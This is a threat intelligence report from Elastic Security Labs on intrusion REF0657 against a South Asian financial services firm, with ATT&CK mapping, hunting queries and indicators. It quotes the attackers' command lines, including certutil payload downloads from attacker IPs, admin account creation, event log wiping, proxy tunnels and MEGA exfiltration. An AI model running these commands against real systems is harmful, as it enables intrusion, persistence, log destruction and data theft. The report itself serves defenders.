Unmasking a Financial Services Intrusion: REF0657

Preamble

In December of 2023, Elastic Security Labs detected a smash-and-grab style intrusion directed at a financial services organization in South Asia. Throughout the breach, a diverse set of open-source tools were employed within the victim's environment, some of which we encountered for the first time. The threat group engaged in different post-compromise activities: from discovery/enumeration to utilizing the victim's internal enterprise software against them and eventually leveraging different tunnelers and side-loading techniques to execute Cobalt Strike. In addition, the adversary used the file hosting service Mega to exfiltrate data from the network.

By disclosing the details of this intrusion set (REF0657) and the various tactics, techniques, and procedures (TTPs), we hope to assist fellow defenders and organizations in recognizing and monitoring this type of activity.

Key takeaways

REF0657 targeted financial services in South Asia
This group leveraged a broad range of post-compromise behaviors, including backdoor access using Microsoft SQL Server, dumping credentials, wiping event logs, and exfiltrating data using MEGA CMD
The activity included an assortment of network tunnelers and proxy tools as well as Cobalt Strike and ties to infrastructure using the C2 framework, Supershell

Campaign analysis

Our team identified the initial enumeration happening in a customer environment on December 17, 2023. While we didn't have visibility around the root cause of the infection, we continued to monitor the environment. Over the next several weeks, we discovered seven different hosts, mainly servers, exhibiting a large swath of activity, including:

Discovery/enumeration
Downloading additional tools/components
Renaming and staging tools in legitimate folder locations in the environment
Dumping credentials from the registry and adding users to machines
Modifying the environment to enable lateral movement and persistence
Executing proxy tunnelers and shellcode to maintain access into the environment
Compressing and exfiltrating data using cloud services provider Mega
Wiping event logs on multiple machines

Execution Flow / Timeline

A significant portion of the activity observed by our team came through command-line execution abusing Microsoft SQL Server (sqlservr.exe). While we couldn’t pinpoint the root cause, we have reason to believe the attacker gained access to the environment through this remotely accessible server and then started executing commands and running programs using the MSSQL’s stored procedure (xp_cmdshell). This initial endpoint served as the beachhead of the attack where all activity seemed to originate from here.

Discovery/Enumeration/Staging

The threat actor used several standard Windows utilities for initial discovery and enumeration. The following graphic shows the different commands spawned from the parent process (sqlservr.exe):

Observed command-lines associated with discovery

Oftentimes, the attacker checked to verify their payloads were running, reviewed network connections on victim machines, and performed directory listings to check on their different files.

After initial access was gained, the actor tried several methods for downloading additional payloads and tooling. The adversary started to use certutil.exe and then moved to bitsadmin.exe, PowerShell’s DownloadFile() method, and eventually back to certutil.exe. These different tools interacted with IP addresses (149.104.23[.]17 and 206.237.3[.]150).

Observed command-lines associated with staging

Lateral Movement + Persistence

As the actors moved in the environment, they leveraged remote SMB and WMI to create a local administrator account named "helpdesk" on each machine. In some cases, they set up a randomly named Windows service (qLVAMxSGzP) as a persistence mechanism. This service would execute a temporary batch file with commands to add a local user and insert this user into the local administrator group. After execution, the file would then be deleted.

%COMSPEC% /Q /c echo net user helpdesk P@ssw0rd /add && \ 
net localgroup administrators helpdesk /add \ 
^> \\127.0.0.1\C$\FOUGTZ 2^>^&1 > %TEMP%\VOruiL.bat & \ 
%COMSPEC% /Q /c %TEMP%\VOruiL.bat & %COMSPEC% /Q /c del %TEMP%\VOruiL.bat

Execution

The adversary moved to Cobalt Strike for C2 and further execution. This time, they used a legitimately signed version of Trend Micro’s Deep Security Monitor (ds_monitor.exe). This was used to load Cobalt Strike by side-loading a malicious DLL (msvcp140.dll). We observed the download of the DLL from a certutil.exe execution, and then we confirmed this behavior via call stack telemetry.

"C:\Windows\system32\cmd.exe" /c certutil -urlcache -split -f \ 
ht""""tp://206.237.3[.]150:443/1.txt \ 
C:\users\public\downloads\msvcp140.dll

The screenshot below shows that the actor placed the TrendMicro application inside a directory labeled McAfee in ProgramData. We can see the malicious DLL being loaded from the same directory by checking the call stack.

Malicious DLL side-loading of msvcp140.dll

Shortly after, Run Key persistence was added to execute (ds_monitor.exe) on system startup.

reg  add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v \ 
TrendMicro /t REG_SZ /d \ 
"C:\ProgramData\McAfee\TrendMicro\ds_monitor.exe" /f /reg:64

An analysis on msvcp140.dll reveals that the threat actor tampered with the DllEntryPoint of the legit Windows DLL by substituting it with modified code sourced from a public repository - this is a custom Cobalt Strike memory evasion loader.

Decompiled Sleep Obfuscation loading Cobalt Strike

While the original code retrieved the Cobalt Strike beacon from memory, the altered version loads a beacon in base64 format from a file named config.ini that connects to msedge[.]one.

Dumping credentials

One of the main methods observed for gathering credentials was dumping the Security Account Manager (SAM) registry hive on different servers.

Events showing SAM registry dump

Network/Registry/Logging Modifications

The threat actor modified several different configurations and settings to help further increase their access to the environment. One of our first observations of this behavior was enabling RDP (set value to 0) through the registry at the following path (HKLM\SYSTEM\ControlSet001\Control\Terminal Server\fDenyTSConnections). Then, they disabled the Windows Firewall rules using the command: NetSh Advfirewall set allprofiles state off.

Afterward, they enabled Restricted Admin mode through a registry modification, this allowed the adversary to conduct pass-the-hash style attacks against Remote Desktop Protocol (RDP).

cmd.exe /Q /c REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" \ 
/v DisableRestrictedAdmin /t REG_DWORD /d 00000000 \ 
/f 1> \\127.0.0.1\C$\Windows\Temp\RExePi 2>&1

In addition to these changes, the attacker also wiped the Windows event logs for System and Security notifications using the Windows Event Utility, wevtutil.exe:

cmd.exe /Q /c wevtutil.exe cl System 1> \ 
\\127.0.0.1\C$\Windows\Temp\ksASGt 2>&1

cmd.exe /Q /c wevtutil.exe cl Security 1> \ 
\\127.0.0.1\C$\Windows\Temp\uhxJiw 2>&1

Tunneling/Proxy Tools

After a day of initial access, the adversary generated several shellcode injection alerts using AppLaunch.exe (a binary that manages and executes applications built with Microsoft's .NET Framework) and outputting the results to a file called 1.txt. The command line argument associated with this alert is as follows: c:\programdata\AppLaunch.exe proxy -r 206.237.0[.]49:12355 >> 1.txt

After examining the injected code, we identified the shellcode as a Golang binary known as iox, which can be compiled from the following publicly available repository. This tool is designed for port forwarding and proxying with additional features such as traffic encryption. Based on the observed command line, the attacker established a proxy connection to 206.237.0[.]49 on port 12355.

Intended or not, the proxy utility was launched by several different legitimate processes: lsass.exe, vmtoolsd.exe, and mctray.exe. In this case, the threat actor side-loaded a common malicious unsigned DLL (mscoree.dll) located in the C:\programdata\ directory.

Malicious DLL side-loading of mscoree.dll

The actor employed another proxy known as Rakshasa, downloaded directly from the tool's official GitHub page using the certutil command. It was stored in c:\users\public\downloads\ra.exe, and then executed with the following command: C:\Windows\system32\cmd.exe /C C:\Users\Public\Downloads\ra.exe -d 149.104.23[.]176:80.

This command creates a proxy tunnel to the threat actor infrastructure, connecting to the IP address 149.104.23.176 on port 80. If that wasn’t enough, the actor started to send and retrieve data from the network through ICMP tunneling. For example, when the actor executed the tasklist command, the output was saved to C:\programdata\re.txt, and exfiltrated through ICMP using PowerShell.

ICMP tunneling script using PowerShell

Exfiltration

One of the more noteworthy parts of this intrusion was centered around the adversary downloading MEGA Cmd, a command-line utility that works with the Mega file hosting service. While still leveraging MSSQL, they downloaded this program, renaming it to ms_edge.exe.

"C:\Windows\system32\cmd.exe" /c certutil -urlcache -split -f \ 
ht""""tp://206.237.3.150:443/megacmd.exe \ 
C:\users\public\downloads\ms_edge.exe

Shortly after, we observed this utility being executed with an argument to a configuration file (called tmp) and a compressed file stored with a backup extension (.bak) being used in conjunction with Mega.

C:\users\public\downloads\ms_edge.exe  --config \ 
C:\users\public\downloads\tmp copy \ 
REDACTED_FILENAME.bak mega_temp:

Infrastructure

Throughout this investigation, the threat group used several servers to host their payloads or forward network traffic. The Elastic Security Labs team discovered two web servers with open directories hosting files publicly reachable on:

206.237.3[.]150
206.237.0[.]49

Open directory at 206.237.3[.]150

In addition, our team observed Supershell panel, a Chinese-based C2 platform running on 206.237.[0].49:8888.

Supershell Panel on 206.237.0[.]49

We validated an earlier finding in the previous section when we found a configuration file (referred to as tmp in the Exfiltration section) used for automation with the Mega platform containing credentials used by the adversary. As well, there was a variety of web shell files and scripts originating from the following public repositories:

Furthermore, within these directories, we identified a few interesting binaries:

cloud_init

One of the files (cloud_init) is a Golang ELF binary packed with UPX. After inspection, it was determined that it was compiled from the NPS repository, another intranet proxy server compatible with most common protocols. The threat actor altered the code to encrypt the strings during compilation. The decryption process uses separate byte arrays where the bytes of one array are combined with the bytes of the other array, employing operations such as addition, XOR, or subtraction for the decryption.

NPS string obfuscation example

MSASN1.dll

After review, this DLL matched the same functionality/code as the previously discussed file (msvcp140.dll).

REF0657 through MITRE ATT&CK

Elastic uses the MITRE ATT&CK framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.

Tactics

Tactics represent the why of a technique or sub-technique. The adversary’s tactical goal is the reason for performing an action. The tactics observed in REF0657 were:

Techniques

Techniques represent how an adversary achieves a tactical goal by performing an action. Elastic Security Labs observed the following techniques within REF0657:

Summary

In summary, this intrusion highlighted some new tooling while re-emphasizing that not all intrusions are dictated by novel malware and techniques. These types of threats demonstrate the real-world challenges most organizations are faced with daily.

The threat group moved very quickly in this environment, where within almost 24 hours, meaningful data to the attacker was extracted from the network. Sharing some of these details can help defenders plug possible holes or gaps in coverage from some of these techniques.

The Diamond Model

Elastic Security Labs utilizes the Diamond Model to describe high-level relationships between the adversaries, capabilities, infrastructure, and victims of intrusions. While the Diamond Model is most commonly used with single intrusions, and leveraging Activity Threading (section 8) as a way to create relationships between incidents, an adversary-centered (section 7.1.4) approach allows for a, although cluttered, single diamond.

REF0657 - Diamond Model

Detecting REF0657

The following detection rules and behavior prevention events were observed throughout the analysis of this intrusion set:

Detection

Prevention

Hunting queries in Elastic

Hunting queries could return high signals or false positives. These queries are used to identify potentially suspicious behavior, but an investigation is required to validate the findings.

ES|QL queries

Using the Timeline section of the Security Solution in Kibana under the “Correlation” tab, you can use the below ES|QL queries to hunt for similar behaviors:

FROM logs-*
  WHERE process.parent.name == "sqlservr.exe" 
  AND process.name == "cmd.exe" 
  AND process.command_line 
  RLIKE ".*certutil.*"

FROM logs-*
  WHERE process.name == "ms_edge.exe" 
  AND process.code_signature.exists == false 
  AND NOT process.executable 
  RLIKE ".*Program Files.*"

YARA

Elastic Security has created the following YARA rules to identify this activity:

Observations

All observables are also available for download in both ECS and STIX format in a combined zip bundle.

The following observables were discussed in this research.

Observable	Type	Name	Reference
206.237.3[.]150	ipv4-addr		File hosting infrastructure
206.237.0[.]49	ipv4-addr		File hosting and supershell infrastructure
104.21.54[.]126	ipv4-addr		Cobalt Strike infrastructure
149.104.23[.]176	ipv4-addr
msedge[.]one	domain-name		Cobalt Strike infrastructure
bc90ef8121d20af264cc15b38dd1c3a866bfe5a9eb66064feb2a00d860a0e716	SHA-256	mscoree.dll
84b3bc58ec04ab272544d31f5e573c0dd7812b56df4fa445194e7466f280e16d	SHA-256	MSASN1.dll

About Elastic Security Labs

Elastic Security Labs is the threat intelligence branch of Elastic Security dedicated to creating positive change in the threat landscape. Elastic Security Labs provides publicly available research on emerging threats with an analysis of strategic, operational, and tactical adversary objectives, then integrates that research with the built-in detection and response capabilities of Elastic Security.

Follow Elastic Security Labs on Twitter @elasticseclabs and check out our research at www.elastic.co/security-labs/.